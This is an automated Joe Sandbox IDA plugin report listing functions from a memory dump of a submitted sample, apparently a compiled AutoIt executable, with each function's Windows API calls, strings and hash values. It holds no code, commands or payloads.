Part of subcall function 00247E23: InitializeCriticalSectionAndSpinCount.KERNEL32(002DAC68,00000FA0,?,?,00247B51,00245E77,002D6C70,00000014), ref: 00247E41

__mtterm.LIBCMT ref: 00247B55

Part of subcall function 00247BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00247B5A,00245E77,002D6C70,00000014), ref: 00247D3F
Part of subcall function 00247BBD: _free.LIBCMT ref: 00247D46
Part of subcall function 00247BBD: DeleteCriticalSection.KERNEL32(002DAC68,?,?,00247B5A,00245E77,002D6C70,00000014), ref: 00247D68

__calloc_crt.LIBCMT ref: 00247B7A
GetCurrentThreadId.KERNEL32 ref: 00247BA3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: b4cd0445c79e66aad9a5fa1d1eb8c6d36f0e10f930e2e0ce0bb826c1daf8e93e
Instruction ID: 2bed71b59a6b8063b31d5b88cad79a7032ff085bbef3c75fefe66e4f07330f17
Opcode Fuzzy Hash: b4cd0445c79e66aad9a5fa1d1eb8c6d36f0e10f930e2e0ce0bb826c1daf8e93e
Instruction Fuzzy Hash: 81F0903263E3121AE72D7B347C0AA4A2784DF02738B200B9AF974D54D2FF60887149A1

Function 002227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0022281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00222825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00222830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0022283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00222843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0022284B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 32d125e894dbb81e6030eb7ded554c1bf0be38602d4dd731b49b7c401e88441d
Instruction ID: 5be37a2edb614510fb26a233d4d685e67349fca6c653d43e9df080b10d7788fb
Opcode Fuzzy Hash: 32d125e894dbb81e6030eb7ded554c1bf0be38602d4dd731b49b7c401e88441d
Instruction Fuzzy Hash: DC0167B0902B5ABDE3008F6A8C85B52FFA8FF19754F00411BA15C47A42C7F5A864CBE5

Function 00269AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 308b40ac01a51fb4d52f9f993860c4d2fbe25ea4bcf3d39ff36ae31c415d6041
Instruction ID: 78846d03a7e647db2e4f32087f4a89785db54d7413ab8804c523ed62b2e4b8ad
Opcode Fuzzy Hash: 308b40ac01a51fb4d52f9f993860c4d2fbe25ea4bcf3d39ff36ae31c415d6041
Instruction Fuzzy Hash: 0D01A436112212ABDB151F98FC9CEEB77ADFF89702B140429F903968A1DF75AC90DB50

Function 00267BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00267C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00267C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00267C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00267C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00267C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00267C4C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d02d7137f31823a2be1ea0ff8282787d6d5a87ba2aef96724a90993bd28199f9
Instruction ID: 7ea0761b950c239d01a39ef15153937905d88e9ce8d04418bbd804c45d2d6832
Opcode Fuzzy Hash: d02d7137f31823a2be1ea0ff8282787d6d5a87ba2aef96724a90993bd28199f9
Instruction Fuzzy Hash: 4DF03A72241158BBE7215B52BC0EEEF7B7CEFC7B15F040059FA0691451DBA05A41C6B5

Function 00269A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00269A33
EnterCriticalSection.KERNEL32(?,?,?,?,00295DEE,?,?,?,?,?,0022ED63), ref: 00269A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00295DEE,?,?,?,?,?,0022ED63), ref: 00269A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00295DEE,?,?,?,?,?,0022ED63), ref: 00269A5E

Part of subcall function 002693D1: CloseHandle.KERNEL32(?,?,00269A6B,?,?,?,00295DEE,?,?,?,?,?,0022ED63), ref: 002693DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00269A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00295DEE,?,?,?,?,?,0022ED63), ref: 00269A78

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fbbd2bfb8501e6bb590d0256033c2809d6940ead15e1cc963f909ae139b1a177
Instruction ID: c17e502f639212de146baf741a68bb76230e8153d67043caefeb9a7f7e067c20
Opcode Fuzzy Hash: fbbd2bfb8501e6bb590d0256033c2809d6940ead15e1cc963f909ae139b1a177
Instruction Fuzzy Hash: 3AF0E236141202ABD7111FA4FC8CEEB3779FF86302B040025F903958A1CF799C50DB50

Function 00221CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0023F4EA: std::exception::exception.LIBCMT ref: 0023F51E
Part of subcall function 0023F4EA: __CxxThrowException@8.LIBCMT ref: 0023F533

__swprintf.LIBCMT ref: 00221EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00221D49

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: bce6b4f7f6d04196e57372b510d915f3e378b6cef357450f5bb701d569e10471
Instruction ID: a04d7afe8139662cca8c930b33c96692b8837f931f98e625aed1bf47a1a886b2
Opcode Fuzzy Hash: bce6b4f7f6d04196e57372b510d915f3e378b6cef357450f5bb701d569e10471
Instruction Fuzzy Hash: 5691AF71124222AFCB24EFA4D885C6EB7B4BF95700F51491DF885972A1DB70EE24CF92

Function 0027AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0027B006
CharUpperBuffW.USER32(?,?), ref: 0027B115
VariantClear.OLEAUT32(?), ref: 0027B298

Part of subcall function 00269DC5: VariantInit.OLEAUT32(00000000), ref: 00269E05
Part of subcall function 00269DC5: VariantCopy.OLEAUT32(?,?), ref: 00269E0E
Part of subcall function 00269DC5: VariantClear.OLEAUT32(?), ref: 00269E1A

Strings

AUTOIT.ERROR, xrefs: 0027B11B
Incorrect Parameter format, xrefs: 0027B03E, 0027B20B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 57abba447f6b3b114144f8c8b6da290da2e56b809c56c38e844aec687604a47b
Instruction ID: 32bad1657f410a71431b090ef75caa7caca3ea2e868aa7f1dc84c32247dfc5d6
Opcode Fuzzy Hash: 57abba447f6b3b114144f8c8b6da290da2e56b809c56c38e844aec687604a47b
Instruction Fuzzy Hash: 36919C706283019FCB10DF64D484A5BB7E4AF89704F14886EF88A9B362DB31E955CB52

Function 00265347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023C6F4: _wcscpy.LIBCMT ref: 0023C717

_memset.LIBCMT ref: 00265438
GetMenuItemInfoW.USER32(?), ref: 00265467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00265513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0026553D

Strings

0, xrefs: 00265430

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 852781874c9b50c6fc7d829fddcb29fdb9f1db5628dcafb4e50118f31dc42818
Instruction ID: 219dab5bc93811dc23fad4b7e683394e191935547c5097a954c5c28236d4ccc4
Opcode Fuzzy Hash: 852781874c9b50c6fc7d829fddcb29fdb9f1db5628dcafb4e50118f31dc42818
Instruction Fuzzy Hash: A75105715347229BD714DF28C88966BB7E8AF85750F84062AF896D31D0DBB0CDF48B92

Function 00260213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0026027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002602B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002602C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00260344

Strings

DllGetClassObject, xrefs: 002602B7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: c19b786c74f0930712ab104adf6dfdeac76a33b40fd2fa5bfc7f37b7be027036
Instruction ID: 9fae81c6efd218ff6c08d5ec66d244740ed66ec8182e1f001adcb1c3a06af548
Opcode Fuzzy Hash: c19b786c74f0930712ab104adf6dfdeac76a33b40fd2fa5bfc7f37b7be027036
Instruction Fuzzy Hash: 91415B71620205EFDB15CF54C8C4B9B7BB9EF45311F1480A9E9099F206DBB1DDA4EBA0

Function 00265007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00265075
GetMenuItemInfoW.USER32 ref: 00265091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 002650D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002E1708,00000000), ref: 00265120

Strings

0, xrefs: 0026506D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 7e494357fab2a5ea317af320dd0c07c417c594bc7ff4e544b9571b7309102a2d
Instruction ID: 9359a834b7495c455e1ab598564daf22ffe4846632970df7760f52ea1407a588
Opcode Fuzzy Hash: 7e494357fab2a5ea317af320dd0c07c417c594bc7ff4e544b9571b7309102a2d
Instruction Fuzzy Hash: 7A410330214752AFD720DF24D884B6AB7E8AF8A314F14465EF89997381D730E8A4CF62

Function 0026E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0026E742
GetLastError.KERNEL32(?,00000000), ref: 0026E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0026E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0026E7B9

Strings

p1#v`K$v, xrefs: 0026E78D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID: p1#v`K$v
API String ID: 3321077145-1068180069
Opcode ID: 2436d507631d1b2a626bc5784dcf3e5db3d2beeb0bf32a4e64898a000965fa23
Instruction ID: bf01efccc766c71b221329f9de9b648c87381f862dedec1a7e22ce2246776f2b
Opcode Fuzzy Hash: 2436d507631d1b2a626bc5784dcf3e5db3d2beeb0bf32a4e64898a000965fa23
Instruction Fuzzy Hash: 74411339610611EFCF11EF54D444A4DBBE5AF99710F198488E946AB3A2CB30ECA1CF95

Function 00280567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00280587

Strings

cdecl, xrefs: 002805DE
winapi, xrefs: 002805F8
stdcall, xrefs: 00280609
none, xrefs: 00280662

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: eee4eb160bfab02756b16b5e5f5faf35ab589aa18b3e7bfab849fbac261ba36c
Instruction ID: 61d53d756d6af4d8a1c76c7e640226c668ed959f73fbd9f63a49fd30e2c8f1cd
Opcode Fuzzy Hash: eee4eb160bfab02756b16b5e5f5faf35ab589aa18b3e7bfab849fbac261ba36c
Instruction Fuzzy Hash: 8A319474520226AFCF00EF94DD819EEB3B8FF55314B104A2AE426A76D1DB71A939CF50

Function 0025B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0025B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0025B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0025B8D1

Strings

ListBox, xrefs: 0025B84D
ComboBox, xrefs: 0025B815

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 461abf13ef8ddc5b15ce1d0b1d54779993b212aec123422246e69f95c4865d9b
Instruction ID: 0e1aa76dcd6b4209abb38e9ad61aeb2e4105b70ed0c1b0a57494e831bda0b4be
Opcode Fuzzy Hash: 461abf13ef8ddc5b15ce1d0b1d54779993b212aec123422246e69f95c4865d9b
Instruction Fuzzy Hash: 8F213772920108BFDB059FA4E88ADFE777CDF06351B104129F422A72E0DB740D2E8B24

Function 002743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00274401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00274427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00274457
InternetCloseHandle.WININET(00000000), ref: 0027449E

Part of subcall function 00275052: GetLastError.KERNEL32(?,?,002743CC,00000000,00000000,00000001), ref: 00275067

Strings

, xrefs: 00274450

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: d8d14a1076606aff0ac967ea7996eb68a31c22aaa6567ff24f7e6f72c9a0b9b1
Instruction ID: 5258d16229d85c8035a0698b25b8b5014c509f828cc5c5c160358f0875925f16
Opcode Fuzzy Hash: d8d14a1076606aff0ac967ea7996eb68a31c22aaa6567ff24f7e6f72c9a0b9b1
Instruction Fuzzy Hash: 44218EB2610208BFE711AF64DC95EBFB6ECFB49758F10C01AF10AA6140EB748D15AB70

Function 002890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0023D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0023D1BA
Part of subcall function 0023D17C: GetStockObject.GDI32(00000011), ref: 0023D1CE
Part of subcall function 0023D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0023D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0028915C
LoadLibraryW.KERNEL32(?), ref: 00289163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00289178
DestroyWindow.USER32(?), ref: 00289180

Strings

SysAnimate32, xrefs: 00289137

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 1c68e75982c210832e8969234b3c4aad8b9e612cd9e8cfc8e2553822cfbc1b10
Instruction ID: b65597beb4a6b13b76d12a69235da51c904fb7137e4c192b0e00637bcce3e696
Opcode Fuzzy Hash: 1c68e75982c210832e8969234b3c4aad8b9e612cd9e8cfc8e2553822cfbc1b10
Instruction Fuzzy Hash: 5621B075624207BBEF106F649C8CEBA37ADEB95364F180218F919A21D0C771CCA1AB60

Function 00269568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00269588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002695B9
GetStdHandle.KERNEL32(0000000C), ref: 002695CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00269605

Strings

nul, xrefs: 00269600

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e889888aa185ffbbe6cfe0c2ce49f9dae8c3adfca7dcf83e6d6fbdb8598c2ea9
Instruction ID: fa3d48bbc75eab95736bd4705375ea3c07d5771abf6240af3d4c83adf1a11085
Opcode Fuzzy Hash: e889888aa185ffbbe6cfe0c2ce49f9dae8c3adfca7dcf83e6d6fbdb8598c2ea9
Instruction Fuzzy Hash: 16218E70610206AFDB219F29DC45A9A7BACAF85720F604A19FCA2D72D0DF70D9E4CB50

Function 00269634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00269653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00269683
GetStdHandle.KERNEL32(000000F6), ref: 00269694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002696CE

Strings

nul, xrefs: 002696C9

Memory Dump Source

